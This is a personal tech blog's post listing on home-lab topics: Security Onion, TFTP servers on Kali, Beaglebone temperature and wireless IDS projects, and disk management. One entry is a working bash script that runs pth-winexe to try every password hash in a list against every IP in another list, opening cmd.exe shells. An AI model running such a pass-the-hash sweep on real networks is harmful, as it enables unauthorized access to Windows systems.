Posts

Security Onion on the Antsle

My Setup of Security Onion on the Antsle:

Recently my IDS box, an Intel Atom D2500 Fanless Mini-ITX PC, D2500CCE, died.

Truth be told, I think it came from the factory in a bad state. I originally thought I had a bad graphics driver, but after much troubleshooting I noticed that it wasn't a driver issue at all. The box just sometimes wouldn't boot up correctly with video. It seems heat related, something like not enough thermal paste on the CPU, as after it is powered off for a while it is more likely to boot than when it is warm. Along with that issue, this box maxed out at 4GB of RAM (it only has 2 memory slots, each of which will only take a 2GB card max) and had a single processor, so it was underpowered for Security Onion.

So, I decided to quit limping along on P.O.S. boxes and buy a somewhat more heavyweight box for my networked IDS. Security Onion requires a minimum of 8GB of RAM and 4 cores per their specs page https://github.com/security-onion-solutions…
Recent posts

Pass-The-Hash BruteForcer

Here's a simple script to try a list of hashes out against a list of IPs:

#!/bin/bash
# Reads a file of IPs (passed as the FIRST parameter) and, for each IP,
# tries every hash in a file of hashes (passed as the SECOND parameter).
# i.e. root# PassTheHashBruteForcer.sh FileOfIPs.txt FileOfHashes.txt

echo "syntax is: "
echo "root# PassTheHashBruteForcer.sh FileOfIPs.txt FileOfHashes.txt"

while read -r line1
do
    while IFS='' read -r line2 || [[ -n "$line2" ]]; do
        echo "/usr/bin/pth-winexe -U $line2 //$line1 cmd.exe"
        /usr/bin/pth-winexe -U "$line2" "//$line1" cmd.exe
    done < "$2"
done < "$1"

atftpd vs tftpd-hpa

Recently I was trying to tftp files from a Windows computer to a Kali box. One version of Windows worked, but another didn't. After much troubleshooting, here were my symptoms:

I could tftp files in either direction between any two Kali boxes
I could NOT tftp files to a specific Windows 7 box from any Kali box
I could NOT tftp files to a Chrooted-Ubuntu-Chromebook box from a Kali box

After MUCH troubleshooting, going through every setting in atftpd, it seemed like it literally was a client OS problem.  Different clients simply would not download files---unacceptable.

Thus, I switched to tftpd-hpa. To install:
apt-get install tftpd-hpa

Files go to/come from /srv/tftp, but that directory needs to be owned by the tftp user. Thus, I needed to:
chown -R tftp:tftp /srv/tftp

Also, if you want to be able to put files ON the tftp server (from a client), you need to modify /etc/default/tftpd-hpa:
change TFTP_OPTIONS="--secure" to TFTP_OPTIONS="--secure --create"

I also changed the IP li…

Temper Temperature monitor on a Beaglebone Black

Beaglebone Black as a temperature monitor:

Recently I wanted to monitor the temperature of my shed.  I thought I'd use a small computer such as a Raspberry Pi or a Beaglebone or Odroid.

My Raspberry Pi boxes were all in use, so I grabbed my Beaglebone, which was doing nothing.

I flashed it with the Debian 9.3 2018-03-05 4GB SD IoT image, but that seemed like it was running lots of bloatware and the ethernet interface wouldn't take a static IP with /etc/network/interfaces.

So I went with the Debian 9.3 2018-01-28 4GB SD LXQT image instead. I still had the same problem: lots of junk was running, and I couldn't configure my interface by modifying /etc/network/interfaces.

So my first step was to get rid of all the bloatware. If you're using a Raspberry Pi or something, you can skip this and just go to the second step below.

STEP 1--Remove Bloatware from Beaglebone Black:

With some searching, I came across this post:
https://www.linuxquestions.org/questions/linux-newbie-8/inte…

Kudos to Google and Blogger!

I just spent the past hour or so copy/pasting my GoDaddy Blog that is going away into Blogger.   I have to say, I LIKE Blogger, having only really used it one day.   Pictures, URLs, and everything that I copy/pasted into Blogger worked like a CHAMP!  I can't imagine how it would have been easier, considering that GoDaddy canceled my QuickView Blogcast account, so I couldn't back it up.  But copy/pasting worked great, which shows that Google knows what they are doing!  I used to have a lot of problems with GoDaddy and blogging... So in the end, I guess I'm glad I moved to Blogger!

Moving /opt to new disk

Recently I was playing with a Kali VM and I installed so much stuff to it that I used up the disk!  Literally, I was at 100% used!  Yikes!  

I started to try to delete unnecessary files, trash, cached apt packages, etc, but quickly came to the conclusion that I wanted everything that I had on the Kali VM, and my disk was still 96% full.  So I needed a way to offload files that I still wanted.  
I looked through my VM, which had a single 20GB hard drive, and saw that /usr had 10GB by itself, and /opt had 4GB.  So I decided to create a new virtual hard drive, move over my /opt files, and change /opt's location in /etc/fstab to point to the new directory.   This solved my problem, as my drive that USED to say 96% full, now says 73% full, just by moving /opt.   
Here's how I moved it:
I added a new virtual hard drive in VirtualBox that was 12GB.   I booted up the VM, went into fdisk, and noted (by doing 'ls /dev/sd*') that my new drive was called sdb.  I used fdisk to crea…

Beaglebone Black as a Wireless Intrusion Detection System (WIDS)

Recently I have been wanting a wireless IDS (WIDS) to detect nefarious wifi activity.  I also had a Beaglebone Black hanging around that I wanted to put to good use.   This seemed like a perfect match, and indeed it seems to be so!

I did some research on WIDSs, and although there are SUPPOSED to be several out there, nearly all that I seemed to find were commercial, Windows-based products, not something I could use myself.
About the only exception to that rule was Kismet, so I decided to give that a try. Kismet is supposed to work as a WIDS, and per its documentation should catch the following attacks:
Kismet supports the following alerts; where applicable the WVE (Wireless Vulnerability and Exploits, www.wve.org) ID is included: AIRJACKSSID (Fingerprint, Deprecated): The original 802.11 hacking tools, Airjack, set the initial SSID to 'airjack' when starting up. This alert is no longer relevant as the Airjac…